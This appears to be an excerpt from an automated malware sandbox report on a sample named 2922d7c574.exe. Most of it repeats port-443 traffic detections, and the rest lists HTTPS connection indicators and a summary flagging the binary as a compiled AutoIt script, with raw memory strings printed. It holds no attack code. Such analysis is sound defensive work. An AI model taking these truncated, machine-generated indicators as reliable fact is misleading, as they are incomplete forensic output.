Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49998 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2ca48d91-5
Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_66671215-1
Source: 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d6732cef-4
Source: 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 